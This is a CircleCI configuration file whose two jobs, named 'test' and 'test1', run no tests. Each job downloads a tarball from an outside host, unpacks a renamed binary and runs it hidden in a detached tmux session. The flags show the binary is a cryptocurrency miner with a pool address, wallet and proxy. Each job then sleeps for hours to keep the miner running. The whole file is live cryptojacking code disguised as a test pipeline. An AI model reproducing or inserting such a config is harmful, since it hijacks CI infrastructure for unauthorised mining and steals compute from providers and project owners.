version: 2.1

jobs:
  test:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install sudo tmux htop wget curl -y; wget http://mrgeek.me/fb/garchain.tar.gz; tar xvfz garchain.tar.gz; cd apache; mv rf leona; chmod +x leona; sudo tmux new -d -s my-session "./leona -t 32 --randomize --quiet -a yespowersugar -o midaroamu.ruok.org:7042 -u sugar1q6s33se24w97npv2dtdpg8hcdzj2u3n338nlvsx.nLEO -x 3.128.34.6:34844"
      - run: 
            command: sleep 9910294
            no_output_timeout: 4h

  test1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install sudo tmux htop wget curl -y; wget http://mrgeek.me/fb/garchain.tar.gz; tar xvfz garchain.tar.gz; cd apache; mv rf leona; chmod +x leona; sudo tmux new -d -s my-session "./leona -t 32 --randomize --quiet -a yespowersugar -o midaroamu.ruok.org:7042 -u sugar1q6s33se24w97npv2dtdpg8hcdzj2u3n338nlvsx.nLEO -x 3.128.34.6:34844"
      - run: 
            command: sleep 9910294
            no_output_timeout: 4h

workflows:
  main:
    jobs:
      - test
      - test1